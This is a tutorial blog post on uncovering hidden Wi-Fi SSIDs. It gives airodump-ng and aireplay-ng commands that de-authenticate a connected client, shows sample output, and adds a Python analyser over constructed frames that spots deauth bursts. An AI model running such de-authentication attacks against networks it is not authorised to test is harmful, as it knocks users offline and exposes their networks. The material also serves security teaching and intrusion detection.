Find Hidden SSIDs

Known as security through obscurity, many people hide their SSIDs from being broadcast. Just like MAC address blocking, this is a worthless form of protection. There is nothing secure about hiding your SSID. It's like the wizard hiding behind the curtain. It does not add any value to your security, and like MAC address blocking it adds complication with no reward.

Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first. Start airodump-ng with the following command, replacing the interface with your own.
airodump-ng wlan1

The readout should look something like this.

CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:34:64:91  -29       19        1    0   6  54e  WPA2 CCMP   PSK  linksys
 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length: 6>

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1

As you can see from the devices found, one of them has a hidden SSID. airodump-ng shows a hidden SSID as <length: x>, where x is the length of the blanked-out SSID the access point is still advertising in its beacons. Now lock airodump-ng on to that access point's channel and BSSID.
airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1

The switches are as follows:

-c = channel of the target access point
--bssid = MAC address of the target access point

This is what the airodump-ng readout should look like now.

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length: 6>

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1
Here we can see the target access point with one client attached. We now need to de-authenticate this client and see if we can get the SSID during the re-authentication. This works because the SSID is only blanked in the beacons: when the client reconnects, it is sent in the clear in the client's probe request and association request and in the access point's probe response, so airodump-ng can fill it in.

Now open a new terminal window, leaving airodump-ng running, and run this command in the new terminal.
aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1

The switches for this command are as follows:

-0 = attack mode 0, de-authentication (the number following it is the number of deauth packets to send)
-a = target access point MAC address
-c = target client MAC address
Now switch back to the original terminal window that still has airodump-ng running.
This is what it should look like now.

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  hacked

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1  hacked

As you can see, we now know that the SSID for the target router is "hacked".

If it does not work the first time, run aireplay-ng again until it does.
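To make concrete both why the <length: 6> entry above is not really hidden and how the de-authentication step shows up to anyone monitoring the air, here is a small frame analyser written for this post. It is an added example, not part of the original article or of the aircrack-ng suite. It parses 802.11 management frames with pure Python, renders the SSID element the way airodump-ng does (an empty or NUL-filled element becomes <length: N>), records the SSID that the client's association request and the access point's probe response disclose on reconnect, and counts deauthentication frames per access point/client pair as a simple burst detector. All frames are constructed in memory from the two MAC addresses used in the post; the helper names, the 10-frame threshold and the frame contents are assumptions of this example.

```python
"""Toy 802.11 management-frame analyser over constructed frames (example code).

Demonstrates (1) a "hidden" SSID: the beacon carries an SSID element that is
empty or NUL-filled, which airodump-ng renders as <length: N>, while the
client's association request and the AP's probe response carry it in the clear;
(2) a deauth-burst detector, the monitoring-side view of the aireplay-ng step.
"""
import struct
from collections import Counter

SUBTYPE = {"assoc_req": 0, "probe_req": 4, "probe_resp": 5, "beacon": 8, "deauth": 12}
NAME = {v: k for k, v in SUBTYPE.items()}
# bytes of fixed fields that precede the tagged elements in each frame body
FIXED_BEFORE_IES = {0: 4, 4: 0, 5: 12, 8: 12}
HDR_LEN = 24  # FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2)


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02X}" for x in b)


def build(subtype, addr1, addr2, addr3, body=b""):
    """Construct a management frame in memory: type 0, subtype in FC bits 4-7."""
    fc = struct.pack("<H", SUBTYPE[subtype] << 4)
    return (fc + b"\x00\x00" + mac_bytes(addr1) + mac_bytes(addr2)
            + mac_bytes(addr3) + b"\x00\x00" + body)


def ssid_ie(ssid):
    """SSID information element: element ID 0, length, value."""
    return b"\x00" + bytes([len(ssid)]) + ssid


def parse(frame):
    """Extract subtype, addresses and the raw SSID element (if any) from a frame."""
    fc, = struct.unpack_from("<H", frame, 0)
    subtype = (fc >> 4) & 0xF
    rec = {"subtype": NAME.get(subtype, "other"), "da": mac_str(frame[4:10]),
           "sa": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22]), "ssid_ie": None}
    if subtype in FIXED_BEFORE_IES:
        pos = HDR_LEN + FIXED_BEFORE_IES[subtype]
        while pos + 2 <= len(frame):  # walk the tagged elements
            eid, elen = frame[pos], frame[pos + 1]
            if eid == 0:
                rec["ssid_ie"] = frame[pos + 2:pos + 2 + elen]
                break
            pos += 2 + elen
    return rec


def ssid_label(ie):
    """Render an SSID element the way airodump-ng does."""
    if ie is None:
        return None
    if len(ie) == 0 or all(b == 0 for b in ie):  # hidden: empty or NUL-filled
        return f"<length: {len(ie)}>"
    return ie.decode("utf-8", "replace")


def analyse(frames, deauth_threshold=10):
    """Per BSSID: what beacons advertise, what reconnect frames disclose, deauth bursts."""
    beacon, disclosed, deauths = {}, {}, Counter()
    for rec in map(parse, frames):
        label = ssid_label(rec["ssid_ie"])
        if rec["subtype"] == "beacon":
            beacon[rec["bssid"]] = label
        elif rec["subtype"] in ("assoc_req", "probe_resp") and label and not label.startswith("<length"):
            disclosed.setdefault(rec["bssid"], label)
        elif rec["subtype"] == "deauth":
            deauths[(rec["bssid"], rec["da"])] += 1  # (AP, targeted client)
    bursts = {k: n for k, n in deauths.items() if n >= deauth_threshold}
    return {"beacon": beacon, "disclosed": disclosed, "deauth_bursts": bursts}


AP, CLIENT, BCAST = "28:EF:01:35:34:85", "28:EF:01:23:45:67", "FF:FF:FF:FF:FF:FF"


def sample_frames():
    """Constructed capture mirroring the post: hidden beacon, 30 deauths, reconnect."""
    ts_ivl_cap = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)  # timestamp, interval, capability
    frames = [build("beacon", BCAST, AP, AP, ts_ivl_cap + ssid_ie(b"\x00" * 6))]  # <length: 6>
    frames += [build("deauth", CLIENT, AP, AP, struct.pack("<H", 7)) for _ in range(30)]  # reason 7
    frames.append(build("probe_resp", CLIENT, AP, AP, ts_ivl_cap + ssid_ie(b"hacked")))
    frames.append(build("assoc_req", AP, CLIENT, AP, struct.pack("<HH", 0x0411, 10) + ssid_ie(b"hacked")))
    return frames


if __name__ == "__main__":
    print(analyse(sample_frames()))
```

Run on the constructed capture, the beacon entry for the access point reads <length: 6>, the disclosed entry reads "hacked", and the deauth counter flags 30 frames aimed at the client, which is exactly the signature a wireless IDS keys on for the aireplay-ng step; a normal client departure produces one or two deauthentication frames, not dozens in a few seconds.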